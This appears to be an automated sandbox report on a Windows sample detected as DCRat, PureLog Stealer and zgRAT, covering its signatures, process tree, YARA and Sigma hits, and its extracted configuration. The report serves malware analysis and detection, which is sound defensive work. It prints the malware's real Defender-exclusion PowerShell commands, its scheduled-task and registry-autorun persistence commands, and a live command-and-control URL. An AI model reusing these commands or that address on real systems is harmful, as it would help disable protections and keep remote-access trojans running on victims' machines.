Edit tour

Windows Analysis Report
4t8f8F3uT1.exe

Overview

General Information

Sample name:	4t8f8F3uT1.exe renamed because original name is a hash value
Original sample name:	5e8c152d54c2160cd8226d744e30560a.exe
Analysis ID:	1580836
MD5:	5e8c152d54c2160cd8226d744e30560a
SHA1:	44c3c3ad115e2fb4d5749c0500e614854e200379
SHA256:	cab653c942101a8462ef207a31f9335fbcc5cf39bde3efac40f07f1c67a89a1c
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files with benign system names

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Suspicious execution chain found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

4t8f8F3uT1.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\4t8f8F3uT1.exe" MD5: 5E8C152D54C2160CD8226D744E30560A)

wscript.exe (PID: 7112 cmdline: "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2216 cmdline: C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ComwebDriverbroker.exe (PID: 3536 cmdline: "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

csc.exe (PID: 6080 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 4788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 5916 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 4892 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD70.tmp" "c:\Windows\System32\CSCE93499D36A1149A8864C8A5B6E525A2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 3776 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4952 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5044 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6452 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2328 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1096 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HpNAzDiYON.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7436 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7552 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

dllhost.exe (PID: 5044 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

schtasks.exe (PID: 3416 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5952 cmdline: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1600 cmdline: schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1976 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6092 cmdline: schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5704 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5236 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5720 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5920 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4828 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexch" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5396 cmdline: schtasks.exe /create /tn "SIUNRHqHRVexchS" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2268 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3504 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5740 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\BrowserCore\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6236 cmdline: schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 5 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5248 cmdline: schtasks.exe /create /tn "ComwebDriverbroker" /sc ONLOGON /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1396 cmdline: schtasks.exe /create /tn "ComwebDriverbrokerC" /sc MINUTE /mo 6 /tr "'C:\portcomSurrogateRefSession\ComwebDriverbroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 4916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7680 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Idle.exe (PID: 5376 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

Idle.exe (PID: 5228 cmdline: "C:\Program Files (x86)\java\jre-1.8\bin\Idle.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

SIUNRHqHRVexch.exe (PID: 4996 cmdline: "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

SIUNRHqHRVexch.exe (PID: 1832 cmdline: "C:\Program Files (x86)\windows portable devices\SIUNRHqHRVexch.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

smss.exe (PID: 6240 cmdline: C:\Users\Default\Pictures\smss.exe MD5: E741574F3B1602BA40508C8EE4E8CD26)

smss.exe (PID: 7064 cmdline: C:\Users\Default\Pictures\smss.exe MD5: E741574F3B1602BA40508C8EE4E8CD26)

ComwebDriverbroker.exe (PID: 7512 cmdline: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe MD5: E741574F3B1602BA40508C8EE4E8CD26)

ComwebDriverbroker.exe (PID: 7524 cmdline: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe MD5: E741574F3B1602BA40508C8EE4E8CD26)

dllhost.exe (PID: 7536 cmdline: "C:\Program Files\Windows Security\BrowserCore\dllhost.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

dllhost.exe (PID: 7544 cmdline: "C:\Program Files\Windows Security\BrowserCore\dllhost.exe" MD5: E741574F3B1602BA40508C8EE4E8CD26)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://lopatasovka.ru/generatordlePublic", "MUTEX": "DCR_MUTEX-PDpnNMPNDj96r52VRbvY", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
4t8f8F3uT1.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
4t8f8F3uT1.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\portcomSurrogateRefSession\ComwebDriverbroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Security\BrowserCore\dllhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Security\BrowserCore\dllhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\Idle.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Portable Devices\SIUNRHqHRVexch.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Pictures\smss.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Default\Pictures\smss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Pictures\smss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\Pictures\smss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2136314831.0000000004A6D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2135696001.0000000006212000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000000.2158339900.0000000000F92000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: ComwebDriverbroker.exe PID: 3536	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.4t8f8F3uT1.exe.4abb6f6.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.4t8f8F3uT1.exe.4abb6f6.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.4t8f8F3uT1.exe.62606f6.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.4t8f8F3uT1.exe.62606f6.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.4t8f8F3uT1.exe.62606f6.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.ComwebDriverbroker.exe.f90000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.ComwebDriverbroker.exe.f90000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\Pictures\smss.exe, CommandLine: C:\Users\Default\Pictures\smss.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\Pictures\smss.exe, NewProcessName: C:\Users\Default\Pictures\smss.exe, OriginalFileName: C:\Users\Default\Pictures\smss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\Default\Pictures\smss.exe, ProcessId: 6240, ProcessName: smss.exe

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetFilename: C:\Program Files\Windows Security\BrowserCore\dllhost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Pictures\smss.exe", EventID: 13, EventType: SetValue, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe", ParentImage: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ParentProcessId: 3536, ParentProcessName: ComwebDriverbroker.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', ProcessId: 3776, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\Default\Pictures\smss.exe, CommandLine: C:\Users\Default\Pictures\smss.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\Pictures\smss.exe, NewProcessName: C:\Users\Default\Pictures\smss.exe, OriginalFileName: C:\Users\Default\Pictures\smss.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\Default\Pictures\smss.exe, ProcessId: 6240, ProcessName: smss.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\Default\Pictures\smss.exe", EventID: 13, EventType: SetValue, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\Default\Pictures\smss.exe", EventID: 13, EventType: SetValue, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe", ParentImage: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ParentProcessId: 3536, ParentProcessName: ComwebDriverbroker.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline", ProcessId: 6080, ProcessName: csc.exe

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files (x86)\windowspowershell\Modules\PowerShellGet\1.0.0.1\SIUNRHqHRVexch.exe", EventID: 13, EventType: SetValue, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SIUNRHqHRVexch

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4t8f8F3uT1.exe", ParentImage: C:\Users\user\Desktop\4t8f8F3uT1.exe, ParentProcessId: 5740, ParentProcessName: 4t8f8F3uT1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe" , ProcessId: 7112, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ProcessId: 3536, TargetFilename: C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\portcomSurrogateRefSession/ComwebDriverbroker.exe", ParentImage: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, ParentProcessId: 3536, ParentProcessName: ComwebDriverbroker.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\smss.exe', ProcessId: 3776, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

